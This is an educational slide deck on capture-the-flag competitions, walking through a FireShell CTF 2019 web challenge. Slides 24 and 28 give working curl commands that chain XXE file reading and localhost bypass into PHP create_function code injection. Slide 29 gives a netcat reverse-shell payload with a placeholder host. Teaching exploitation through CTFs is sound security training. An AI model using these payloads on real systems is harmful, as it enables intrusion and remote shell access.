1 of 36

Play CTFs!

Awesome security CTFs and where to find them

Lenin Alevski

2 of 36

About me

  • Lenin Alevski
  • Security Software Engineer
  • Open Source Contributor
  • Corporate & Startup world
  • I’m obsessed with cybersecurity

3 of 36

Agenda

  1. Whats a capture the flag?
  2. Different ctf categories
  3. CTF walkthrough
  4. Where to practice? public CTFs to play
  5. Awesome resources to learn

4 of 36

CTF - Capture The Flag

5 of 36

The flag

6 of 36

Attack and defense CTFs

7 of 36

Jeopardy CTFs - (Crypto, RE, Web, Forensics, PWn, etc)

8 of 36

9 of 36

Reversing

10 of 36

Pwn (binary exploitation)

11 of 36

Crypto

12 of 36

Forensic

13 of 36

Web

14 of 36

Misc

Everything else that is not already mentioned, ie:

  • Programming
  • OCR
  • Linux commands
  • Theory
  • Etc

15 of 36

Web CTF example: FireShell CTF 2019

16 of 36

http://68.183.31.62:94/list

<div class='ui center aligned container'>

<img src="download?file=files/1.jpg&hash=7e2becd243552b441738ebc6f2d84297" height="500"/>

<img src="download?file=files/test.txt&hash=293d05cb2ced82858519bdec71a0354b" height="500"/>

</div>

17 of 36

http://68.183.31.62:94/download?file=index.php&hash=828e0013b8f3bc1bb22b4f57172b019d

<br />

<b>Notice</b>: Undefined variable: type in <b>/app/Controllers/Download.php</b> on line <b>21</b><br />

<?php

ini_set('display_errors',1);

ini_set('display_startup_erros',1);

error_reporting(E_ALL);

require_once('Routes.php');

function __autoload($class_name){

...

...

...

}

?>

18 of 36

Other interesting files

  • http://68.183.31.62:94/download?file=/app/Controllers/Custom.php&hash=55fdef99c788af643d2676ac21ada5f4
  • http://68.183.31.62:94/download?file=/app/Controllers/Admin.php&hash=42c58ba0a247b5c76bce27387e90b99f
  • http://68.183.31.62:94/download?file=/etc/passwd&hash=c5068b7c2b1707f8939b283a2758a691
  • http://68.183.31.62:94/download?file=/etc/shadow&hash=2fe8599cb25a0c790213d39b3be97c27
  • http://68.183.31.62:94/download?file=/app/Routes.php&hash=b1146e09263e0aae856ff66a57968211

19 of 36

Routes.php - /custom route

Route::set('custom',function(){

$handler = fopen('php://input','r');

$data = stream_get_contents($handler);

if(strlen($data) > 1){

Custom::Test($data);

}else{

Custom::createView('Custom');

}

});

20 of 36

Test function in Custom.php

class Custom extends Controller{

public static function Test($string){

$root = simplexml_load_string($string,'SimpleXMLElement',LIBXML_NOENT);

$test = $root->name;

echo $test;

}

}

`�<root>

<name>some text</name>

</root>

`

{

name: 'some text',

}

21 of 36

Routes.php - /admin route

Route::set('admin',function(){

if(!isset($_REQUEST['rss']) && !isset($_REQUES['order'])){

Admin::createView('Admin');

}else{

if($_SERVER['REMOTE_ADDR'] == '127.0.0.1' || $_SERVER['REMOTE_ADDR'] == '::1'){

Admin::sort($_REQUEST['rss'],$_REQUEST['order']);

}else{

echo ";(";

}

}

});

22 of 36

Sort Function in Admin.php

class Admin extends Controller{

public static function sort($url,$order){

$uri = parse_url($url);

...

$xml = simplexml_import_dom($dom);

if($xml){

...

usort($data, create_function('$a, $b', 'return strcmp($a->'.$order.',$b->'.$order.');'));

echo '<div class="ui list">';

...

23 of 36

What we learn so far...

Code execution is possible

Sort Function is only accessible from localhost

We need to find a way to bypass this

24 of 36

Remember the Test function in /custom ?

$ url='http://68.183.31.62:94/custom'

$ xml_content='

<?xml version="1.0" ?>

<!DOCTYPE root [<!ENTITY test SYSTEM "php://filter/convert.base64-encode/resource=https://www.alevsk.com">]>

<root>

<name>&test;</name>

</root>

'

$ curl --request POST --url "$url" --header 'cache-control: no-cache' --header 'content-type: application/xml' --data "$xml_content" | base64 -d

25 of 36

XML External Entity (XXE) processing

It’s not a bug vulnerability, it’s a feature

POST /custom

GET /

HOST www.google.com

Content

Content

26 of 36

Using XXE to bypass the localhost validation

POST /custom

GET /admin?rss=SOME_URL&order=PAYLOAD

HOST localhost

Response

27 of 36

Having fun crafting the payload

Vulnerable line of code:

Payload (order parameter):

�Code replaced at runtime:

usort($data, create_function('$a, $b', 'return strcmp($a->'.$order.',$b->'.$order.');'));

id, null) && die(shell_exec('ls -la /')); ($aaa="

usort($data, create_function('$a, $b', 'return strcmp($a->id, null) && die(shell_exec(\'ls -la /\')); ($aaa=",$b->id, null) && die(shell_exec(\'ls -la /\')); ($aaa=");'));

28 of 36

Encoding the payload and putting all together

$ url='http://68.183.31.62:94/custom'

$ xml_content='<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY test SYSTEM "php://filter/convert.base64-encode/resource=http://localhost/admin?rss=https%3A%2F%2Fwww.website.com%2Fpath%2Fxxe.xml&order=id%2C%20null)%20%26%26%20die(shell_exec(%27ls%20-la%20%2F%27))%3B%20(%24aaa%3D%22">]><root><name>&test;</name></root>'

$ curl --request POST --url "$url" --header 'cache-control: no-cache' --header 'content-type: application/xml' --data "$xml_content" | base64 -d

% Total % Received % Xferd Average Speed Time Time Time Current

Dload Upload Total Spent Left Speed

100 2197 100 1892 100 305 6348 1023 --:--:-- --:--:-- --:--:-- 7347

total 116

.....

drwxr-xr-x 1 root root 4096 Dec 4 15:47 bin

drwxr-xr-x 2 root root 4096 Apr 10 2014 boot

-rwxr-xr-x 1 root root 1122 Feb 15 2016 create_mysql_admin_user.sh

-rw-r--r-- 1 root root 31 Dec 26 03:34 da0f72d5d79169971b62a479c34198e7

.....

....

$ cat da0f72d...

f#{1_d0nt_kn0w_wh4t_i4m_d01ng}

29 of 36

On a real life scenario

Reverse shell with Netcat

No nc? No problem

Whois, Finger, PHP, Python, etc.

Then

  • Privilege escalation
  • Host enumeration
  • Persistence
  • etc

id, null) && die(shell_exec('nc SOMEIP PORT -e /bin/bash')); ($aaa="

https://tcm1911.github.io/posts/whois-and-finger-reverse-shell/

30 of 36

XXE it’s an old vulnerability but still very popular

31 of 36

32 of 36

CTFs are fun

You learn a lot every time you play!

33 of 36

Some free CTFs for you to play

34 of 36

More learning resources

35 of 36

Youtube

36 of 36

Thanks

@alevsk

https://github.com/alevsk

https://www.linkedin.com/in/alevsk/

https://www.alevsk.com